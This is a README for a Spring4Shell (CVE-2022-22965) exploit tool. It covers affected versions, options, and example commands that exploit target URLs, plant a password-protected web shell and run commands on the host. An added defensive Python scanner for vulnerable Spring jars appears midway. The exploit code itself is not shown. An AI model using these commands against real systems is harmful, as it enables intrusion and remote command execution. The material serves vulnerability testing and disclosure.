Exploit script for the Spring4Shell vulnerability (CVE-2022-22965), run against input URLs. The script can also be run on the target machines to identify the paths to affected installations.
The Spring Framework provides a comprehensive programming and configuration model for modern Java-based enterprise applications on any kind of deployment platform. spring-core is a prevalent framework, widely used in Java applications, that lets software developers build Java applications with enterprise-level components effortlessly.
Note: The exploitation script has been tested on applications deployed using Apache Tomcat Server. The auth checks will only work on Linux-based distributions.
- Apache Tomcat as the Servlet container
- Packaged as a traditional WAR (in contrast to a Spring Boot executable jar)
- JDK 9 or higher
- spring-webmvc or spring-webflux dependency
- Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions
- python3 -m pip install -r requirements.txt
- python3 CVE-2022-22965_exploit.py --help
usage: CVE-2022-22965_exploit.py [-h] [-f FILE] [-u URL] [-c CMD] [-d] [-p PASSWORD] [-t TIMEOUT] [-a]
CVE-2022-22965 Exploit code
options:
-h, --help Show this help message and exit
-f FILE, --file FILE File containing URLs to exploit
-u URL, --url URL Target URL to exploit
-c CMD, --cmd CMD Command to run on target
-d, --debug Print the Error
-p PASSWORD, --password PASSWORD Password for the web shell
-t TIMEOUT, --timeout TIMEOUT Timeout for the web shell to get Uploaded
-a, --auth Run on the host to check for vulnerable installations
Run the script against a single URL to exploit the Spring4Shell vulnerability
python3 CVE-2022-22965_exploit.py -u http://172.17.0.1:8888/spring-form/greeting
Run the script for multiple URLs by providing a text file with IPs to detect the Spring4Shell vulnerability
python3 CVE-2022-22965_exploit.py -f ips.txt
Run the script against a single URL to exploit the Spring4Shell vulnerability, using the provided password for the web shell
python3 CVE-2022-22965_exploit.py -u http://172.17.0.1:8888/spring-form/greeting -p csw
Run the script on the target machine to detect the paths of all vulnerable installations. Run as root for more coverage.
python3 CVE-2022-22965_exploit.py -a
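For defenders who want to inventory hosts against the version ranges listed in the prerequisites, the following is an added example, not code from CVE-2022-22965_exploit.py and not a description of how its -a option works. It assumes the Spring version can be read from the jar file name; the function names are hypothetical, and it checks only the Spring dependency and version, not the JDK or the packaging.

```python
import os
import re
import zipfile

# Matches the two dependencies named in the prerequisites, e.g.
# spring-webmvc-5.3.17.jar or spring-webflux-5.2.19.RELEASE.jar
# (assumption: the version is encoded in the jar file name).
JAR_RE = re.compile(r"spring-(webmvc|webflux)-(\d+)\.(\d+)\.(\d+)[^/\\]*\.jar$")


def is_affected(version):
    """True for 5.3.0-5.3.17, 5.2.0-5.2.19 and anything older."""
    return version <= (5, 2, 19) or (5, 3, 0) <= version <= (5, 3, 17)


def _check(name, location, findings):
    m = JAR_RE.search(name)
    if m:
        version = tuple(int(x) for x in m.groups()[1:])
        if is_affected(version):
            findings.append((location, m.group(1), ".".join(map(str, version))))


def find_affected(root):
    """Walk root; return (path, dependency, version) for affected Spring jars,
    including jars bundled under WEB-INF/lib/ of a WAR archive."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            full = os.path.join(dirpath, fname)
            if fname.endswith(".war"):
                try:
                    with zipfile.ZipFile(full) as war:
                        for entry in war.namelist():
                            if entry.startswith("WEB-INF/lib/"):
                                _check(entry, full + "!/" + entry, findings)
                except (zipfile.BadZipFile, OSError):
                    continue  # unreadable or corrupt archive: skip it
            else:
                _check(fname, full, findings)
    return sorted(findings)


if __name__ == "__main__":
    import sys
    for path, dep, ver in find_affected(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{dep} {ver}  {path}")
```

Pass the directory to scan as the first argument, for example a Tomcat webapps directory; run with enough privileges to read every deployment.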
Running the script against the target -
python3 CVE-2022-22965_exploit.py -u http://172.17.0.1:8888/spring-form/greeting
Running the script against the target along with the password -
python3 CVE-2022-22965_exploit.py -u http://172.17.0.1:8888/spring-form/greeting -c id -p csw
Running the script on the target to identify the vulnerable installations -
python3 CVE-2022-22965_exploit.py -a
Sriraam
Security Analyst
Cyber Security Works
Arjun Anand
Ridhwan R
Security Analyst
Cyber Security Works